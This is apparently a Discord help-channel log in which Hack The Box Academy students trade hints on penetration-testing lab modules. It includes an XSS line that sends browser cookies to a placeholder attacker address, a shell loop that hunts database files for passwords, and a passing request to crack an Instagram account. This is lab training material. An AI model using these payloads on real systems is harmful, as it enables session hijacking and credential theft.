rustic sage
fathom pendant
#

Yes

#

When it's zipped and compressed data is stored and handled differently

ashen peak
# fathom pendant Elaborate

After getting the password without using MSF, I uploaded the reverse php code and tried listening with NCAT but no session opened

rustic sage
# fathom pendant Yes

so for unzip i need a unzipping tool like 7zip or a gunzip and also its depends right

fathom pendant
ashen peak
# fathom pendant Elaborate

I also tried using MSF to get the flag but it says I should manually handle the image.php file, which is non-existent.

ashen peak
fathom pendant
#

It exists

#

Read the section carefully

fathom pendant
#

.zip you can just unzip iirc

rustic sage
rustic sage
#

for a .zip folders

fathom pendant
#

It should work

#

Gunzip is generally .gzip

ashen peak
rustic sage
fathom pendant
fathom pendant
rustic sage
fathom pendant
#

No

rustic sage
#

why

fathom pendant
#

Because I shrimply can't be bothered

rustic sage
fathom pendant
#

Like I believe there's just an unzip command

fathom pendant
rustic sage
fathom pendant
#

You are being asked to unzip it on the target system

#

Is that not what the question states?

rustic sage
ashen peak
west spindle
#

Hey πŸ™‚

I'm stuck on the Snort Rule Development question in the Working With IDS/IPS, I already edited the local.rules and I can detect the log4shell attack, but the answer is still Incorrect answer!.... any hint will appreciate

The question is:

There is a file named log4shell.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to log4shell exploitation attempts, where the payload is embedded within the user agent. Enter the keyword that should be specified right before the content keyword of the rule with sid 10000098 within the local.rules file so that an alert is triggered as your answer. Answer format: [keyword];

ashen peak
# fathom pendant The section should tell you

I opened the browser and I can see that there's an image.php but I didn't upload it initially. I guess I have to find a way to get rid of it, so that MSF can open a session at least

umbral fulcrum
spring moon
#

Maybe I'm way behind your stage but how could you find other users I only found the user admin and accessed the shared folder, and there I found Docx.zip but I can't open the file after cracking everything it gives me "Archive type not supported." can you help me?

fathom pendant
fathom pendant
#

And docx2john iirc

spring moon
fathom pendant
#

And you unzip yeah?

spring moon
umbral fulcrum
thorn urchin
fathom pendant
spring moon
#

I unzipped but I'm not sure if there's something called docx2john, I used office2john?

thorn urchin
#

office2john is fine

fathom pendant
#

That what it is

spring moon
tender viper
#

@fathom pendant I was able to successfully use the braa cmd to to enumerate the SNMP service on the Footprinting Lab - Hard but I don't understand what to do next with the information that I found here? the cmd I used was: braa <community string>@IP:.1.3.6.*

thorn urchin
#

you're gunna have to open it

#

install libreoffice, transfer the file, ect

fathom pendant
#

^

thorn urchin
#

there is a route to decrypting it and then unpacking it to maybe retrieve text but youre out of module scope and creating 35x the necessary work

fathom pendant
umbral fulcrum
fathom pendant
#

Keypass

#

That's it

tender viper
spring moon
#

Okay I'm installing liberoffice thanks

compact jacinth
#

hi anyone who could help me out with this ? "Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer."

#

i have looked everywhere but cant find the answer help

fathom pendant
thorn urchin
#

even if its a lot of info and most of it is junk

#

read line by line anyways

#

(welcome to hacking, we read a lot of junk)

tender viper
fathom pendant
#

You also tend to go back and forth on thibgs

fathom pendant
#

It's a skill assessment I'm not just gonna spell out what to do next

pulsar needle
#

https://academy.hackthebox.com/achievement/285625/147 I went from hating password attacks to kind of liking them

sly kelp
fathom pendant
sly kelp
#

This module is kind of irritating in the beginning but over all good

pulsar needle
#

But it has its beauties

sly kelp
#

Definitely

thorn urchin
#

My only complaints with the module is its a slog and doesnt need to be

#

literally just going through and better selecting the correct passwords to not waste as much student time is all thats needed to make the module significantly better

#

cause while in the real world long wait times are realistic and to be expected, long wait times in a learning environment doesnt help much

pulsar needle
thorn urchin
#

Doesn't matter

pulsar needle
#

Ok, i get your point xd

#

For that reason i hated it in the beginning, felt so wasted

thorn urchin
#

One of the hallmarks of effective learning is whats called rapid feedback. Meaning the quicker you can see the results of your attempts, the faster you can adjust to it and thus the faster you learn and the more effective your practice is.

pulsar needle
#

true

mortal echo
#

Sos9spspspss

#

OS9s0ss

rustic sage
#

Are u okay man?

thorn urchin
#

<@&861185840277487616>

#

could be cat but still

proud pine
mortal echo
#

Im doing ban speedrun

#

Duh

rustic sage
#

Goodluck

acoustic owl
pulsar needle
#

Press shift

#

Then you can delete the messages faster

fathom pendant
#

You might be doing the right idea wrong execution. I haven't done this module so I couldn't tell you

west spindle
#

I tried but didn't work

autumn pilot
#

it is just a placeholder

#

you are not required to put the verb in brackets

native parrot
#

ls

zinc marsh
#

I think htb should rework the server-side attacks skills assessment πŸ™„. It is just like a simple ctf which doesn't cover any vulnerability about server-side attacks.

rustic sage
#

yo idrk where else to talk but does anyone wanna take my guide on beaming?

#

i need new users so i can get payed by the dev

rustic sage
#

damn

zinc marsh
#

beaming?

fathom pendant
rustic sage
#

idk

#

it seemed like a big hacking server

#

but it’s most likely different

fathom pendant
#

Still not the right place

rustic sage
#

got it

west spindle
fathom pendant
#

Because first you said beaming then you said game

#

So

pine dagger
#

but you need to have the ; at the end

keen halo
#

hi, what algorithem hash need here [ File Transfer ]
||+ 2 Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, RDP to the box, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.||
i do it three time times , with md5 and sha256

west spindle
#

Thank you @pine dagger I will try harder, but can i back to you if I didn't find it? I mean PM you?

fathom pendant
keen halo
rustic sage
#

Someone can help me? Footprinting Lab - Hard
I already login in ssh with the tom user but I don't know what to do as next step.
I know I need to login in the mysql with the password that I already found in .mysql_history but it retrieve me "permission denied". It exists another user which probably have more privilege than tom where can log in in the mysql, but I don't know how to do it because i didn't find nothing of interesting.

keen halo
novel socket
#

Is there any way to acces unlimited pwnbox in HTB free of cost?

#

I'm 16 I don't have enough money to purchase paid subscription

vital adder
novel socket
#

It's showing 8$ for students who have educational mail

vital adder
#

check faq > Is there a limit on Pwnbox usage?

novel socket
#

Yeah

#

2 hr

vital adder
#
Get unlimited Pwnbox access by either subscribing for any plan or "buying any amount of cubes" in Academy's
novel socket
#

Okay

pine dagger
teal hull
#

I understand this is not a good place to ask but I don’t know where to ask but I have 2 files with word list in them. So each file has a lot of random words. I would like to combine the two word list together. So word list one will get every word in list two behind it. But I need to limit the letters to 15. So I would like to kick out any combination of words that is longer than 15. Can anyone give me any times of what program could do this

#

Hashcat will not do it crunch will not do it

gaunt surge
#

Well you can combine them like this;
cat file1.txt file2.txt > combined.txt

vital adder
fiery berry
whole grotto
#

Hi everyone, i'm currently in the skill assessment of file upload module. I found the upload directory by exploiting a xxe vulnerability. Now my problem is that when i want to access to my files in this directory (even by uploading a photo without payload) i can't, error 404. Can someone help me pls ?

vital adder
rustic sage
vital adder
#

*spoilers

#

also yep try with the cred you have

rustic sage
#

Ok, thx

teal hull
acoustic owl
fiery berry
gaunt surge
rugged stag
#

Have you been able to solve this?

rustic sage
#

BrΓ² wtf

gaunt surge
#

I love that your profile says β€˜old enough to be on discord’ πŸ˜‚

teal hull
teal hull
teal hull
barren apex
#

sed the most confusing linux command of them all πŸ˜„

fiery berry
rustic sage
gaunt surge
teal hull
#

Congrats on that tho

fiery berry
#

DuxSec didn't mean to make fun of you, otherwise if you feel like you can read the man page or the entire sed and awk manual (as I did once)

gaunt surge
acoustic owl
# whole grotto ?

think about how to find out where the files are saved and how they are named.

fathom pendant
teal hull
fathom pendant
low crescent
#

Inside Attacking Common Applications -> IIS Tilde Enumeration, I am having issues reproducing the actual tilde enumeration given in the example, by bruteforcing each character (using the script I wrote on the screenshot). However, that produces no results at all. Each requests leads to a 404.

Keep in mind that I was able to do it using the IIS-ShortName-Scanner tool, and completed the section, but I'm wondering what's the correct way of enumerating it manually.

civic zenith
#

For anyone who has done AD Enumeration & Attacks - Skills Assessment Part I, how did you get the full ip and domain name of MS01?

civic zenith
#

@acoustic owl may I DM ?

acoustic owl
deep owl
#

Skills Assessment - Using Web Proxies

#

Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)

#

i don't know how to fuzz the last charecter

#

any help plz

pine dagger
pine dagger
#

Well... its how I did it.

#

There's a particular page that uses a certain filetype that you can upload.

#

Wait, I may have misread my notes

#

Oh, its in a subdir, but the uploaded file gets some info appended to it.

whole grotto
pine dagger
#

Need to read my own notes more carefully πŸ˜„

#

<@&861185840277487616>

cosmic crest
#

someone interested in a learning buddy beginner level?

rustic sage
#

Did someone solve this? Problem typing "@"...

#

If someone wanna PM about Footprinting medium, thats completly ok:) Issue is syntax related

#

Can't find a way to type "@", dont' have access to the clipboard :/

rustic sage
#

Derp, it's possible to login from Remmina with Administrator account...

compact patrolBOT
#

Slow-mode set in modules to 0 seconds.

hidden trellis
#

Hi everyone, is anyone able to give a little help on race conditions in whitebox attacks?

ripe furnace
#

Any job in UK for cybersecurity fresh graduated 2:1 grades

ripe furnace
fathom pendant
spring moon
#

Hi guys, I'm stuck with "Password Attacks Lab - Medium" I got ssh access as jason then went through all the methods for hunting more credintials for dennis or whatever but can't find any. any hint pls?

spring moon
# fathom pendant Sql

I'm not sure :(((((
for l in $(echo ".sql .db .db .db"); do echo -e "\nDB File extension: $l"; files=$(find / -name "*$l" 2>/dev/null | grep -v "doc|lib|headers|share|man"); for file in $files; do echo -e "\nLines containing 'password' in $file:"; grep "password" "$file"; done; done
I tired this to find any creds there also

mysql -u '' -h ''

ERROR 2003 (HY000): Can't connect to MySQL server on '10.129.x.x:3306'
I'm not sure what does jump host means

fathom pendant
spring moon
#

yes I did using jason but it's not going through

fathom pendant
#

Mysql is running locally

#

Not externally

#

The docs that give you j* cred tell you so

spring moon
#

oh okay I'm in the mysql now digging

#

my focus is below zero

fathom pendant
#

If you have low focus: take a break

spring moon
#

it's 1:49am I wanna finish this question and sleep :DDDD thanks for you quick responses btw ^_^

fathom pendant
#

Sleep now: finish question after sleep

thorn urchin
#

seems like you might have bad username or authentication information

spring moon
thorn urchin
#

its DOMAIN/User

#

not DCHOST.DOMAIN/User

civic zenith
#

oh ok

thorn urchin
#

also Im not sure you can pass the hash in that format. I think you need to specify an option and add the hash there

fathom pendant
#

Indeed

thorn urchin
#

I dont use wmiexec often, look at its help information for specifics

civic zenith
#

thx πŸ™‚

thorn urchin
#

remember to write a note about it so you dont forget for next time

spring moon
low crescent
bitter flax
#

hey everyone, if anyone has completed the β€œchase” machine under β€œIntro to Blue Team” what is the password when opening the compressed file? thank you.

fathom pendant
bitter flax
#

@fathom pendant thank you

fair abyss
#

Hi

#

guys i am new here

latent sigil
#

how do i find a fqdn other than by ping and nslookup?

#

ive been trying to find it by dns, netbios, everything, even ping but nothing seems to be fingerprinting it

fathom stump
#

Other dns queries can return that I believe

latent sigil
#

like what

fathom stump
#

There's at least one way discussed in footprinting/dns

latent sigil
#

damn that is far into my mind

#

alright ill try to go over it

#

Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

tender yarrow
#

Morning all, here we are again, completely stuck and frustrated! This time I am on the Session Hijacking section of the CROSS-SITE SCRIPTING (XSS) module on the pen tester path. I am trying to get the flag but no matter what I do, the php listener is refusing to grab the flag. I am inserting the suggested payload into the profile picture url but I get nothing back! I have rebooted the pwn box and the target! I have followed the content on HTB and I have followed a couple of walkthroughs but nothing seems to work, I am a good 4 hours in now! Any help would be greatly appreciated. Thanks

round gale
#

hello i am working on File upload, client validation section. in the exercise HTB provides us with a web page to upload a profile pic, the exercise asks us to intercept the POST request which uploads the pic. i start up burp and click on open browser , which opens chrome. i click on Intercept in burp, but burp is not intercepting the POST command, its able to intercept only the very first GET command.

#

try to get this in burp, but not able to

acoustic owl
acoustic owl
tender yarrow
tender yarrow
acoustic owl
#

10.10.14.46 is your IP or the IP from the module/other guides?

acoustic owl
#

Your netcat listener or webserver is running on Port 3333?

round gale
tender yarrow
tender yarrow
#

I am now very confused! re the listener and the webserver

tender yarrow
#

well, the content does not make it clear

#

i follow it exactly and it does not work

#

so I am confused

acoustic owl
#

Because the parameters in the Lab are different from the example shown

tender yarrow
#

take this for example, new Image().src='http://OUR_IP/index.php?c='+document.cookie
no mention of a port number

#

yet the listener is listening on 3333

acoustic owl
tender yarrow
#

so the listener and the webserver are both on port 80

acoustic owl
tender yarrow
#

exactly

#

so how is this going to work?

#

i need a webserver to serve up the script

#

and i need a listener to catch the script execution

acoustic owl
#

But I don't understand why you want to run a netcat listener.
Yes, to see if a connection is established at all. But you can also see that with the web server

tender yarrow
#

so the webserver shows the exection of the script

acoustic owl
tender yarrow
#

clearly something has led me to beleive both a webserver and a listener need to be running

#

I find some of this content so confusing

#

im ok with challenging but I do not like unclear instructions

acoustic owl
#

It is important that you understand what exactly works when

tender yarrow
#

or ambigious instructions i should say

#

not helpful at all

#

ok will go back and try with a web server on port 80 and forget the listener

#

thank you

tender yarrow
#

whats obvious to one is not always obvious to another

acoustic owl
tender yarrow
#

I have yes

#

like i say, i just find the content very ambigious

#

i totally get the concepts of what is going on

#

the fine detail is tripping me up on the labs

#

I never had these issues with try hack me

#

maybe I look at heading back over there

acoustic owl
#

TryHackMe takes you by the hand and shows you every single step.
The Academy continues. It explains the details and then lets you try it yourself.

#

For this reason, I often recommend learning the basics first with THM. Then deepen the knowledge with the Academy and learn new things.

#

There are three stages in learning

At the first level you are shown everything step by step. One demonstrates it, you do it after. There are no interfering factors.
Example: riding a bike
Your bike has training wheels, mom/dad is standing right next to you, you are on a well-lit path, no traffic.

In the second stage, you are shown more things. But basically you do everything yourself.
Example riding a bike
Light may be diffuse, there are pedestrians, mom/dad is no longer standing next to you.

Third stage
You have a learning environment, but you train on your own. You are now deepening your knowledge.

Example riding a bike
The training wheels are gone, it is night, there is traffic.
The environment is still safe, but there are many disruptive factors.

pulsar needle
#

Do I just have to wait for this to finish? (Attacking DNS)

acoustic owl
pulsar needle
#

But it takes so long lol

acoustic owl
#

Duration depends on your list

#

You can already continue working with the found subdomains

pulsar needle
#

They have nothing

#

Or I am doing something wrong

#

The A record points to nothing, same with the AAAA record, then I tried CNAME and TXT but got nothing

acoustic owl
#

Is hr.inlanefreight.htb a zone? Or a host?

pulsar needle
#

BRUh

#

Its a zone

#

How will i know if its a zone or host? If the axfr zone transfer wouldnt have worked?

acoustic owl
pulsar needle
#

Yes I know what the difference is, but I dont know how to differenciate between them in a scan, lets say I scan and find helpdesk.inlanefreight.htb and ns.inlanefreight.htb. Lets say helpdesk is a host and ns is a zone, how would i know that?

acoustic owl
#

A zone contains further entries.
At least one SOA and one name server.

The subdomain itself does not tell you if it is a zone or a host.

pulsar needle
#

Ah, oke

#

Thanks

slate palm
#

I wrote a python script that just recursively axfrs

brazen saffron
#

In NMAP Modules, how do I know which port I can select as source port for a filtered port ?

#

How can i get a source port from the DNS I mean, when I have a filtered port.

umbral fulcrum
#

Hi guys, I'm struggling in the
"Password Attacks Lab - Hard"
after getting J*** password, Do I need 2 transfer the L**.k** file, because I can't make it work...

slate palm
slate palm
warm drift
umbral fulcrum
slate palm
slate palm
elder moon
#

I am unable to access web server in "module:- 77 section:- 728" the web enumeration part
is that an issue or i am missing something? ( i am able to access it from pwnbox but not from my kali )

sleek shell
#

Hi guys, need some help with Footprinting-IPMI task 2. I run hashcat with footprinting and rockyou wordlists, but it gives wrong passwords like 'anna' and "oooooo"

carmine osprey
#

Hey guys, I’m stuck on the firewal and ids/ips evasion medium lab. I’ve tried everything I can think of under the sun, and commands other people suggested aswell. My current command is:
Nmap -sSUV -S (ip) β€”Source-port β€”packet-trace

I’ve tried changing the max time out and the aggression level with -T. I got 2 HTB flags but neither worked, maybe they aren’t in the right format? Any help would be amazing! Dms welcome!

vernal tapir
#

if any help plz dm me cuz a lot of msgs here so i will be lost to find the reply

umbral fulcrum
vernal tapir
#

sry guys i new to htb , i don't usually use it !! , so once i tried to restart the machine it says (machine isn't active this week) , how would i know when it's actived again !???

slate palm
umbral fulcrum
#

I guess there R 2 many
so far none are working
thanx anyway

carmine osprey
#

During the medium lab for firewall ids/ips evasion gave me two HTB flags when I ran my nmap scan, but neither work. What info am I supposed to input?

glossy coral
#

guys, I wanna ask for help but I can't send a picture here πŸ™‚

fiery berry
low crescent
quaint hemlock
#

Modules : Windows Privileged Escalation
Sections : dnsadmins
problem : I did what the module tell me to do, but when I do wmic useraccount where name="netadm" get sid i get this:

ERROR:                                                                                                                  
Description = Invalid query```

anyone knows what's wrong?
fiery berry
#

refrain to put the flag when pasting things, please modify the previous post. Make sure there are no spaces before and after when submitting the answer

high dove
#

Has anyone completed an Active directory bloodhound module?
Can you help me solve the last 2 questions of skill assessment?
Azure ones

tranquil breach
#

Hello someone can help me. I'm in "network enumeration with Nmap" module and i try to answer the question where i'm asked to find the hostname by scanning i t.
But when i make hosts discovery scan, i don't find the hostname

tranquil breach
#

Ok

torn steppe
#

anyone could do socat rely with bind shell practice? Metasploit multi/handler is giving me an error with the bind shell

#

was able to do* sorry for my english

quaint hemlock
potent nymph
#

e

surreal path
#

Hi everyone, I'm new here. And I have question I have a laptop that I don't know the password. Is there any way I can unlock without losing data? Thanks! @everyone

fresh pine
#

I'm stuck in β€œPrivesc module > citrix breakout” in the second question trying to create an SMB share, but i get this error

Any advice, hints?

surreal path
inner cloak
torn steppe
high reef
#

good moring fellow hackers

#

i'm in section password attacks / Passwd, Shawdow Opasswd section

#

the question; i've found the root hash but slightly confused on how to crack it

high reef
#

i've tried to unshadow hashes but no luck there

tranquil axle
#

the error message tells you whats wrong with your unshadow attempt

vital adder
tough island
#

Anyone know how to crack insta password

plain coral
high reef
vital adder
#

you didn't create anything because the tool doesn't exist

#

i mean original the file

high reef
#

ok

plain coral
west night
#

Hi @acoustic owl . Pertaining to Attacking Common Services Medium Lab, pretty much the same scenario as coopsgti. Additionally, I tried anonymous login on the ftp port and it failed. Any hints on finding the username would be appreciated.

short hare
#

Can anyone help me with the question in Password Attacks: Password Mutation section

I am pretty much confused and stuck for a while

west night
#

What specifically are you stuck on @short hare ?

short hare
#

The custom.rule gives 90k+ passwords which is not wise to brute force with

west night
#

Try a different service. For example ftp. Additionally, try a different brute forcing tool. I used Hydra. The length is correct. It is supposed to be over 90,000

west night
acoustic owl
#

Login is rejected?
Directory is empty?

west night
#

@acoustic owl "530 Login incorrect"

acoustic owl
high dove
acoustic owl
pulsar needle
#

Skill assessment, attacking common services, I cant bruteforce anything lol

pulsar needle
#

easy

#

lol

#

My brain crashed

#

So I was like

#

anonymous FTp

#

didnt wrok

#

brutefroce FTP

#

didnt work

#

then rdp

#

then I died

#

lol

acoustic owl
zinc marsh
pulsar needle
acoustic owl
pulsar needle
#

lol

rustic sage
#

hello

rustic sage
acoustic owl
high dove
gloomy bramble
#

Attacking Common Services - Hard: I am stuck trying to figure out how to enable xp_cmdshell and/or link server. I am in under J with impersonation. I'm getting not allowed to do messages cause not admin yet. Can someone please give me a nudge on what EXEC command , or what other I should be looking at on this step? What i'm seeing on forums is not working.

thick juniper
#

Hi everyone, I’m on the Active Directory Skills Assessment Pt1, and I’m looking for the clear text PW for the t***** user. I’ve used Mimikatz with selurlsa::logonPasswords to try and reveal them but it comes up with (null), tried dumping the lsass.DMP and cracking with Pypykatz, used Rubeus to dump the hash and try to crack the NTLM (which doesn’t seem to work for me on crack station or John/Hashcat). I feel like it’s a bit simpler than I’m making it and was wondering if anyone could nudge me please?

trail leaf
#

Try using a different tool mentioned in the section. Your head's in the right place, the tools are betraying you.

thick juniper
#

Right now I feel like the tool πŸ˜­πŸ˜‚

fathom pendant
#

It do be how it is

trail leaf
#

Yeah, you don't need to crack anything, they say it's in clear text.

fathom pendant
#

Especially when you find the right answer

obtuse fiber
#

Module: Attacking Common Services
Chapter: Attacking Common Services - Medium
Question: Assess the target server and find the flag.txt file. Submit the contents of this file as your answer.
Issue: are there only 5 ports on the host or should it be 6 because from what I read in here it should be 6 but I kept resting the box and I kept getting 5 only

gloomy bramble
iron oyster
#

Hello I am in Getting started and am having issues with the Privilage Escalation chapter question. I was able to get the first one and i believe I have gotten mostly through the second question. I am running into an issue where when I try to ssh into the root user with the id_rsa file, I keep getting the error Connection Timed Out. Would really appreciate a push in the right direction. Thank you

obtuse fiber
fathom pendant
rustic sage
#

any nudge on File Upload Attacks >Type Filters section , i got the extension which bypassed the restrictions.

gloomy bramble
#

i think once i used that nmap it came up

tribal plinth
obtuse fiber
obtuse fiber
gloomy bramble
fathom pendant
#

Could also try --disable-arp-ping

obtuse fiber
fathom pendant
#

Sometimes it can take a minute for a service to pop up too

primal eagle
#

im hard stuck

#

on the passthehash module

#

with the julio section at the end,

#

nvm got it

#

wth

#

the import-module thing is the problem. I thought you import the whole package somehow. but damn

fathom pendant
#

Well if you close the terminal or open another one, you'll have to still reload it

civic zenith
#

Which modules were we given username wordlists?

fathom pendant
#

Anyone that has it in their resources

rapid sparrow
#

anyone have idea with this??

#

Attacking Common Applications - Skills Assessment II

fathom pendant
#

What have you tried

unborn shard
#

To ask here Kappa

fathom pendant
#

This is a Skills assessment, use the skills you've learned through the module to figure it out

unborn shard
#

I am not the same person, I was just memeing that the only thing the tried so far is asking here

fathom pendant
#

I know

#

I'm just rephrasing my earlier statement

rapid sparrow
odd knot
#

Hope someone can help me: file upload attack, Blacklist Filters
I can upload the file in Burp Suite, but if I go to the target Website its shows me an error message "The Image cannot be displayed because it contains errors."

fiery berry
atomic pelican
#

Hello, I'm trying to start the first box but it is saying that I have an active machine. I've tried closing what I believe to be the open machines but not having luck. The FAQ makes reference to a channel for support but it is currently listed as "No Access" for me.

atomic pelican
#

Labs

barren apex
# atomic pelican Labs

wrong channel, but check in the top for a circle icon and that will tell you what machine your connected too

atomic pelican
#

Which channel should I use? I don't see anything that says HTB labs

atomic pelican
#

It currently says "No Access"

barren apex
atomic pelican
#

No, I didn't see that.

barren apex
tall saffron
atomic pelican
tall saffron
#

You said "the FAQ makes reference to a channel for support" Where did you found this FAQ? the link?

atomic pelican
#

Is that what are you asking for?

tall saffron
#

yeah

#

found it thanks πŸ˜‰

proven silo
#

Hi,
I would like some advice on the modules and my note taking, actually I take notes with Obsidian in order to have the relevant information I need, that is my problem.

I'm starting my first module which is enumeration and I'm having difficulty taking notes, I can't synthesize because all the information is relevant and important, I'm afraid of finding myself with a bible and lose in my notes, do you have any methods to advise me?

wispy aspen